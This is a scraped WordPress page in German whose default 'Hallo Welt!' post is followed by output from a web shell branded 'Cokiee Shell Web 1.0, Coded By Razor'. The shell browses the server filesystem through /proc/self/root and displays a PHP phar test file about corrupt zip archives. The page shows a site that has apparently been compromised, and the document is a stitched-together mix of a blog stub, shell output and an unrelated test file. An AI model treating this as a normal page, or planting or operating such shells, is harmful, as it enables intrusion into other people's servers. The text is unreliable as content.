Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/phar/tests/zip/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/phar/tests/zip/corrupt_001.phpt |
--TEST-- Phar: corrupted zip (count mismatch) --SKIPIF-- <?php if (!extension_loaded("phar")) die("skip"); ?> <?php if (!extension_loaded("spl")) die("skip SPL not available"); ?> --FILE-- <?php try { new PharData(dirname(__FILE__) . '/files/count1.zip'); } catch (Exception $e) { echo $e->getMessage() . "\n"; } try { new PharData(dirname(__FILE__) . '/files/count2.zip'); } catch (Exception $e) { echo $e->getMessage() . "\n"; } ?> ===DONE=== --EXPECTF-- phar error: corrupt zip archive, conflicting file count in end of central directory record in zip-based phar "%scount1.zip" phar error: corrupt zip archive, conflicting file count in end of central directory record in zip-based phar "%scount2.zip" ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare